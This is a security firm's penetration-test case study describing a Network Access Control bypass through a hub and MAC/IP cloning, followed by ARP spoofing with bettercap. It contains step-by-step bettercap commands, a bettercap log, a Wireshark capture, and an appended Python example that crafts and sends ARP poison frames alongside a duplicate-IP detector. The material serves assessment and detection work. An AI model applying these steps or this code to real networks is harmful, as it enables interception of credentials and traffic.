Case Study NAC Bypass and ARP Spoofing

The penetration testers were able to bypass the client's Network Access Control (NAC) solution and conduct ARP spoofing attacks on the internal network by connecting an authenticated device to an unmanaged hub and spoofing the MAC address of the authenticated device. This allowed the testers to intercept network traffic and launch man-in-the-middle attacks without being detected by the NAC solution. The testers used tools like Bettercap to conduct ARP poisoning by sending fake ARP messages linking their MAC address to legitimate IP addresses on the network. This penetration test revealed vulnerabilities that could allow unauthorized access to internal systems and data.


LIFARS

your digital world, secured

Case Study–
NAC bypass & ARP spoofing
To ensure the effectiveness of our clients' security implementations, LIFARS frequently
conducts penetration tests evaluating whether their systems can hold up to real world
scenarios and stay resilient. Our cyber resiliency experts deliver calculated attacks
against systems the same way black hat hackers would.
In December, our client requested that the LIFARS Pen Testing Team perform an internal
black box penetration test as part of a due diligence exercise. The client, an
international financial organization with over 10000 employees and 500 IPv4
addresses, understands the risks it faces on a daily basis and the importance of
meeting compliance standards.
The intent of this assessment was to identify weaknesses in the company's
infrastructure and to detail how these vulnerabilities could impact the
organization. Because the test was black box, the client provided no documentation
about the systems examined; the team worked from their actual state as found on the
network. The team used ARP poisoning as the foothold for mounting further attacks,
such as Man-in-the-Middle (MiTM).

Note: All information in this case study has been modified to maintain the
confidentiality of our client.
PENETRATION TESTING PHASES

There are various methodologies and approaches that can be used during penetration
testing. The LIFARS Pen Testing Team follows the Penetration Testing Execution Standard
(PTES) as the basis for penetration testing execution. The main phases of PTES are
listed below.
1. Pre-engagement Interactions
2. Intelligence Gathering
3. Threat Modeling
4. Vulnerability Analysis
5. Exploitation
6. Post Exploitation
7. Reporting

KEY FINDINGS

While conducting the penetration test, we discovered that the client network had
implemented Network Access Control (NAC). This solution is often used on corporate
networks to prevent unauthorized hosts from accessing internal systems and
services.

Bypassing Network Access Control

Figure 1 NAC Bypass scheme: the attacker and the victim are both connected to a hub
whose uplink goes to the switch port (the authenticator) (incogbyte.github.io)


Hardware Used

100 Mb Hub – multiport repeater and PoE injector

Steps to reproduce NAC bypass:

1. First, we had to find an authenticated host and connect it to our hub. As we
have a PoE injector, we can also connect a VoIP phone and the PC behind it.

2. After that, we connected our machine to the hub and started capturing ARP
frames to identify the MAC and IP address of the valid host.
Figure 2 IP & MAC address of the victim (Wireshark capture of an ARP frame from the
victim, showing its sender MAC and sender IP address)

3. At this point, we can connect the hub to the switch and wait for the victim to
authenticate.

4. After successful authentication, we cloned the victim's MAC and IP address on our
attacking machine and connected it to the hub. Now the switch does not recognize the
difference between the attacker and the client PC.

Figure 3 MAC address change (Windows network adapter properties dialog for the Killer
E2400 Gigabit Ethernet Controller, Advanced tab, where the adapter's property values
are set)


ARP Spoofing

ARP poisoning is when an attacker sends false ARP messages over a local area
network to link the attacker's MAC address with the IP address of a legitimate
computer or server on the network.
Once the attacker's MAC address is linked to an authentic IP address, the attacker
receives anything that other hosts send to that IP address. By poisoning both ends
of a conversation (for example a host and its gateway) and forwarding the traffic,
the attacker can mount a Man-in-the-Middle attack (MiTM) without interrupting the
connection.

Figure 4 Representation of ARP spoofing: Alice (IP 10.0.0.1) and Bob (IP 10.0.0.7),
with MAC addresses aa:aa:aa:aa:aa:aa and bb:bb:bb:bb:bb:bb, are attached to a switch
together with the attacker (IP 10.0.0.3, MAC cc:cc:cc:cc:cc:cc)

We have used bettercap on Windows to launch an ARP spoofing attack.

Steps to reproduce ARP spoofing attack:

1. We need to scan the network for all hosts, using the modules net.recon and
net.probe (the bettercap GUI then lists the discovered hosts).

2. With this newly obtained set of hosts, we can choose which specific host we
want to target. We can either use the console or the GUI to do this.

From the console we type the following command:

set arp.spoof.targets TARGET_IP

From the GUI we can click the IP address in the left column, in this case
192.168.1.161, and choose "Add to arp.spoof.targets" from the pull-down menu
(the same menu also offers Copy and Scan Ports).

3. Before starting the ARP spoofing module, we need to start net.sniff. We can
either use the console or the GUI to do this.

From the console we type the following command:

net.sniff on

From the GUI we can go to: Advanced -> net.sniff -> net.sniff.on

4. Finally, we start the module itself with the console command arp.spoof on. The
log below shows full-duplex mode (arp.spoof.fullduplex set to true), in which
bettercap poisons both the targets and the gateway; bettercap warns that the attack
fails if the router has ARP spoofing protection.

We have now successfully launched ARP spoofing:

12:56 PM net.sniff.mdns mdns 192.168.1.25 : PTR query for _airplay._tcp.local
12:56 PM net.sniff.mdns mdns 192.168.1.25 : PTR query for _raop._tcp.local
12:56 PM endpoint.new Detected 192.168.1.25 84:AD:8D:
12:56 PM endpoint.lost Lost 192.168.1.25 84:AD:8D:
12:56 PM mod.started arp.spoof
12:56 PM sys.log WARNING : arp.spoof full duplex spoofing enabled. if the router has ARP spoofing mechanisms, the attack will fail.
12:56 PM sys.log INFO : arp.spoof arp spoofer started, probing 3 targets.

Verification of ARP spoofing using Wireshark (columns: No., Time, Source,
Destination, Protocol, Length, Info; MAC addresses are truncated to their first
three octets as in the original capture):

36776  304.468178  Micro-St (d8:cb:8a)  84:ad:8d             ARP  60  192.168.1.92 is at d8:cb:8a
36825  304.473401  Micro-St (d8:cb:8a)  84:ad:8d             ARP  60  192.168.1.141 is at d8:cb:8a
37017  304.851396  30:24:32             84:ad:8d             ARP  60  192.168.1.161 is at 30:24:32
37435  305.554225  Micro-St (d8:cb:8a)  30:24:32             ARP  60  192.168.1.205 is at d8:cb:8a (duplicate use of 192.168.1.161 detected!)
37436  305.554328  30:24:32             Micro-St (d8:cb:8a)  ARP  60  192.168.1.161 is at 30:24:32
37437  305.554439  Micro-St (d8:cb:8a)  30:24:32             ARP  60  192.168.1.0 is at d8:cb:8a (duplicate use of 192.168.1.161 detected!)
37439  305.554640  Micro-St (d8:cb:8a)  30:24:32             ARP  60  192.168.1.1 is at d8:cb:8a (duplicate use of 192.168.1.161 detected!)
37440  305.554786  Micro-St (d8:cb:8a)  84:ad:8d             ARP  60  192.168.1.1 is at d8:cb:8a

The attacker's NIC (Micro-St, d8:cb:8a) is answering for several IP addresses at
once, including the gateway 192.168.1.1 and the target 192.168.1.161, which is the
cache poisoning in action. Wireshark's duplicate-address check flags exactly this
condition, one IP address claimed by more than one MAC, and the same signal is what
switch-side Dynamic ARP Inspection or a passive ARP monitor would alert on.
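The ARP mechanics behind the procedure above, as an added example that is not LIFARS code and not from bettercap: passively learning the victim's MAC and IP from ARP frames on the hub (step 2 of the NAC bypass), crafting the pair of unsolicited replies that a full-duplex arp.spoof sends to the target and the gateway, and the Wireshark-style "duplicate use of IP" check that surfaced the attack in the capture. The frames are constructed in memory and the full MAC and IP values (victim 30:24:32:00:00:01 at 192.168.1.161, gateway aa:aa:aa:aa:aa:aa at 192.168.1.1, attacker cc:cc:cc:cc:cc:cc) are made up for the demonstration; send_frames is the only function that touches the network and it assumes Linux raw sockets with root.

```python
# Added example (not LIFARS or bettercap code). Constructed frames; made-up MACs/IPs.
import socket
import struct
from collections import defaultdict

ETH_HDR = struct.Struct("!6s6sH")           # dst MAC, src MAC, EtherType
ARP_PKT = struct.Struct("!HHBBH6s4s6s4s")   # htype, ptype, hlen, plen, op, sha, spa, tha, tpa
ETHERTYPE_ARP = 0x0806
ARP_REQUEST, ARP_REPLY = 1, 2
BROADCAST = "ff:ff:ff:ff:ff:ff"

def mac_str(b: bytes) -> str:
    return ":".join(f"{x:02x}" for x in b)

def mac_bytes(s: str) -> bytes:
    return bytes(int(x, 16) for x in s.split(":"))

def ip_str(b: bytes) -> str:
    return ".".join(str(x) for x in b)

def ip_bytes(s: str) -> bytes:
    return bytes(int(x) for x in s.split("."))

def parse_arp(frame: bytes):
    """Decode Ethernet + ARP; None if the frame is not IPv4-over-Ethernet ARP."""
    if len(frame) < ETH_HDR.size + ARP_PKT.size:
        return None
    _dst, src, etype = ETH_HDR.unpack_from(frame, 0)
    if etype != ETHERTYPE_ARP:
        return None
    htype, ptype, hlen, plen, op, sha, spa, tha, tpa = ARP_PKT.unpack_from(frame, ETH_HDR.size)
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        return None
    return {"op": op, "sha": mac_str(sha), "spa": ip_str(spa),
            "tha": mac_str(tha), "tpa": ip_str(tpa), "eth_src": mac_str(src)}

def build_arp(op: int, sha: str, spa: str, tha: str, tpa: str, eth_dst: str = None) -> bytes:
    """Build a raw Ethernet/ARP frame; unsolicited replies are what poison a cache."""
    eth = ETH_HDR.pack(mac_bytes(eth_dst or tha), mac_bytes(sha), ETHERTYPE_ARP)
    arp = ARP_PKT.pack(1, 0x0800, 6, 4, op, mac_bytes(sha), ip_bytes(spa),
                       mac_bytes(tha), ip_bytes(tpa))
    return eth + arp

def learn_hosts(frames) -> dict:
    """NAC bypass step 2: map IP -> MAC from ARP seen on the hub, sending nothing."""
    table = {}
    for frame in frames:
        arp = parse_arp(frame)
        if arp and arp["spa"] != "0.0.0.0":        # ARP probes carry no sender IP
            table[arp["spa"]] = arp["sha"]
    return table

def spoof_pair(attacker_mac, target_ip, target_mac, gateway_ip, gateway_mac):
    """Full-duplex poison: the target learns gateway_ip -> attacker_mac and the
    gateway learns target_ip -> attacker_mac, so both directions pass the attacker."""
    to_target = build_arp(ARP_REPLY, attacker_mac, gateway_ip, target_mac, target_ip)
    to_gateway = build_arp(ARP_REPLY, attacker_mac, target_ip, gateway_mac, gateway_ip)
    return to_target, to_gateway

def detect_duplicates(frames) -> list:
    """Wireshark-style check: flag an IP claimed by more than one sender MAC."""
    claims = defaultdict(set)
    alerts = []
    for frame in frames:
        arp = parse_arp(frame)
        if not arp or arp["spa"] == "0.0.0.0":
            continue
        claims[arp["spa"]].add(arp["sha"])
        if len(claims[arp["spa"]]) > 1:
            alerts.append((arp["spa"], sorted(claims[arp["spa"]])))
    return alerts

def send_frames(iface: str, frames) -> None:
    """Put frames on the wire (Linux AF_PACKET, needs root). Not used by demo()."""
    with socket.socket(socket.AF_PACKET, socket.SOCK_RAW) as s:
        s.bind((iface, 0))
        for frame in frames:
            s.send(frame)

# Constructed sample capture: the victim ARPs for its gateway and the gateway answers.
VICTIM_MAC, VICTIM_IP = "30:24:32:00:00:01", "192.168.1.161"    # made-up full MAC
GATEWAY_MAC, GATEWAY_IP = "aa:aa:aa:aa:aa:aa", "192.168.1.1"
ATTACKER_MAC = "cc:cc:cc:cc:cc:cc"
SAMPLE_FRAMES = [
    build_arp(ARP_REQUEST, VICTIM_MAC, VICTIM_IP, "00:00:00:00:00:00", GATEWAY_IP, eth_dst=BROADCAST),
    build_arp(ARP_REPLY, GATEWAY_MAC, GATEWAY_IP, VICTIM_MAC, VICTIM_IP),
]

def demo():
    hosts = learn_hosts(SAMPLE_FRAMES)                        # what the attacker learns on the hub
    poison = spoof_pair(ATTACKER_MAC, VICTIM_IP, hosts[VICTIM_IP], GATEWAY_IP, hosts[GATEWAY_IP])
    alerts = detect_duplicates(SAMPLE_FRAMES + list(poison))  # what a monitor on the segment sees
    return hosts, poison, alerts

if __name__ == "__main__":
    hosts, poison, alerts = demo()
    print("learned:", hosts)
    print("poison frames:", [parse_arp(f) for f in poison])
    print("alerts:", alerts)
```

The legitimate two-frame exchange produces no alert; the moment the two poison replies are added, both 192.168.1.1 and 192.168.1.161 are claimed by a second MAC, which is the same condition Wireshark reported above. Note that the NAC bypass earlier in the case study defeats this check by design: a cloned MAC and IP look identical to the victim's, so the only remaining signal is the duplicate claim appearing on the authenticated port.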

CONCLUSION

With ARP spoofing and the resulting Man-in-the-Middle (MiTM) position we were able to
sniff user login data and critical password hashes. These attacks were only successful
because we were able to bypass NAC: the switch port authorizes the authenticated MAC
address, the hub lets a second device share that port, and the MAC and IP are trivial
to clone, so the NAC never authenticated the device actually sending the traffic.

REPORTING

Key issues listed in this case study, and many others, were put into the final report.
The issues were identified at risk levels: low, medium, high and critical. The executive
summary provided a brief summary of vulnerabilities discovered during this
assessment broken down by category. Many of these issues were presented graphically
with recommendations given for resolution of each.

Worried about Attacks Against Your Organization?


For Incident Response and Threat Intelligence consultancy contact LIFARS today.
Email: contact@lifars.com | Call us at: (212) 222-7061
